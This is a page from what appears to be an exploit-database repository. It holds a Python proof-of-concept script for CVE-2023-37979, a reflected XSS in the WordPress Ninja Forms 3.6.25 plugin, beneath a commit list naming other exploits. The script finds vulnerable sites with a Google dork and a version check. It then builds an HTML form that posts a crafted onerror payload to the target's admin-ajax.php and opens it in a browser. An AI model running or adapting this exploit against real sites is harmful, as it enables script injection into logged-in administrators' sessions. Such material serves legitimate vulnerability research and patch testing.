010e679abe
25 changes to exploits/shellcodes/ghdb ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE) Shelly PRO 4PM v0.11.0 - Authentication Bypass Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated) Academy LMS 6.0 - Reflected XSS Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload JLex GuestBook 1.6.4 - Reflected XSS Joomla JLex Review 6.0.1 - Reflected XSS News Portal v4.0 - SQL Injection (Unauthorized) PHPJabbers Cleaning Business 1.0 - Reflected XSS PHPJabbers Night Club Booking 1.0 - Reflected XSS PHPJabbers Rental Property Booking 2.0 - Reflected XSS PHPJabbers Service Booking Script 1.0 - Reflected XSS PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS PHPJabbers Taxi Booking 2.0 - Reflected XSS Webedition CMS v2.9.8.8 - Remote Code Execution (RCE) Webedition CMS v2.9.8.8 - Stored XSS Webutler v3.2 - Remote Code Execution (RCE) WordPress adivaha Travel Plugin 2.3 - Reflected XSS WordPress adivaha Travel Plugin 2.3 - SQL Injection Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
158 lines
No EOL
5.6 KiB
Python
Executable file
158 lines
No EOL
5.6 KiB
Python
Executable file
# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated)
|
|
# Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt
|
|
# Date: 2023-07-27
|
|
# Exploit Author: Mehran Seifalinia
|
|
# Vendor Homepage: https://ninjaforms.com/
|
|
# Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip
|
|
# Version: 3.6.25
|
|
# Tested on: Windows 10
|
|
# CVE: CVE-2023-37979
|
|
|
|
from requests import get
|
|
from sys import argv
|
|
from os import getcwd
|
|
import webbrowser
|
|
from time import sleep
|
|
|
|
|
|
# Values:
|
|
url = argv[-1]
|
|
if url[-1] == "/":
|
|
url = url.rstrip("/")
|
|
|
|
# Constants
|
|
CVE_NAME = "CVE-2023-37979"
|
|
VULNERABLE_VERSION = "3.6.25"
|
|
|
|
# HTML template
|
|
HTML_TEMPLATE = f"""<!DOCTYPE html>
|
|
<!-- Created By Mehran Seifalinia -->
|
|
<html>
|
|
<head>
|
|
<title>{CVE_NAME}</title>
|
|
<style>
|
|
body {{
|
|
font-family: Arial, sans-serif;
|
|
background-color: #f7f7f7;
|
|
color: #333;
|
|
margin: 0;
|
|
padding: 0;
|
|
}}
|
|
header {{
|
|
background-color: #4CAF50;
|
|
padding: 10px;
|
|
text-align: center;
|
|
color: white;
|
|
font-size: 24px;
|
|
}}
|
|
.cool-button {{
|
|
background-color: #007bff;
|
|
color: white;
|
|
padding: 10px 20px;
|
|
border: none;
|
|
cursor: pointer;
|
|
font-size: 16px;
|
|
border-radius: 4px;
|
|
}}
|
|
.cool-button:hover {{
|
|
background-color: #0056b3;
|
|
}}
|
|
</style>
|
|
</head>
|
|
<body>
|
|
<header>
|
|
Ninja-forms reflected XSS ({CVE_NAME})</br>
|
|
Created by Mehran Seifalinia
|
|
</header>
|
|
<div style="padding: 20px;">
|
|
<form action="{url}/wp-admin/admin-ajax.php" method="POST">
|
|
<input type="hidden" name="action" value="nf_batch_process" />
|
|
<input type="hidden" name="batch_type" value="import_form_template" />
|
|
<input type="hidden" name="security" value="e29f2d8dca" />
|
|
<input type="hidden" name="extraData[template]" value="formtemplate-contactformd" />
|
|
<input type="hidden" name="method_override" value="_respond" />
|
|
<input type="hidden" name="data" value="Mehran"}}<img src=Seifalinia onerror=alert(String.fromCharCode(78,105,110,106,97,45,102,111,114,109,115,32,114,101,102,108,101,99,116,101,100,32,88,83,83,10,67,86,69,45,50,48,50,51,45,51,55,57,55,57,10,45,77,101,104,114,97,110,32,83,101,105,102,97,108,105,110,105,97,45))>" />
|
|
<input type="submit" class="cool-button" value="Click here to Execute XSS" />
|
|
</form>
|
|
</div>
|
|
<div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div>
|
|
<footer>
|
|
<a href="https://github.com/Mehran-Seifalinia">Github</a>
|
|
</br>
|
|
<a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a
|
|
</footer>
|
|
</body>
|
|
</html>
|
|
"""
|
|
|
|
def exploit():
|
|
with open(f"{CVE_NAME}.html", "w") as poc:
|
|
poc.write(HTML_TEMPLATE)
|
|
print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html")
|
|
print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
|
|
sleep(2)
|
|
webbrowser.open(f"{getcwd()}\{CVE_NAME}.html")
|
|
|
|
# Check if the vulnerable version is installed
|
|
def check_CVE():
|
|
try:
|
|
response = get(url + "/wp-content/plugins/ninja-forms/readme.txt")
|
|
if response.status_code != 200 or not("Ninja Forms" in response.text):
|
|
print("[!] Ninja-forms plugin has not installed on this site.")
|
|
return False
|
|
else:
|
|
version = response.text.split("Stable tag:")[1].split("License")[0].split()[0]
|
|
main_version = int(version.split(".")[0])
|
|
partial_version = int(version.split(".")[1])
|
|
final_version = int(version.split(".")[2])
|
|
if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25):
|
|
print(f"[*] Vulnerable Nonja-forms version {version} detected!")
|
|
return True
|
|
else:
|
|
print(f"[!] Nonja-forms version {version} is not vulnerable!")
|
|
return False
|
|
except Exception as error:
|
|
print(f"[!] Error: {error}")
|
|
exit()
|
|
|
|
# Check syntax of the script
|
|
def check_script():
|
|
usage = f"""
|
|
Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET]
|
|
|
|
OPTIONS:
|
|
--exploit: Open a browser and execute the vulnerability.
|
|
TARGET:
|
|
An URL starts with 'http://' or 'https://'
|
|
|
|
Examples:
|
|
> {argv[0].split("/")[-1]} https://vulnsite.com
|
|
> {argv[0].split("/")[-1]} --exploit https://vulnsite.com
|
|
"""
|
|
try:
|
|
if len(argv) < 2 or len(argv) > 3:
|
|
print("[!] Syntax error...")
|
|
print(usage)
|
|
exit()
|
|
elif not url.startswith(tuple(["http://", "https://"])):
|
|
print("[!] Invalid target...\n\tTarget most starts with 'http://' or 'https://'")
|
|
exit()
|
|
else:
|
|
for arg in argv:
|
|
if arg == argv[0]:
|
|
print("[*]Starting the script >>>")
|
|
state = check_CVE()
|
|
if state == False:
|
|
exit()
|
|
elif arg.lower() == "--exploit":
|
|
exploit()
|
|
elif arg == url:
|
|
continue
|
|
else:
|
|
print(f"[!] What the heck is '{arg}' in the command?")
|
|
except Exception as error:
|
|
print(f"[!] Error: {error}")
|
|
exit()
|
|
|
|
if __name__ == "__main__":
|
|
check_script() |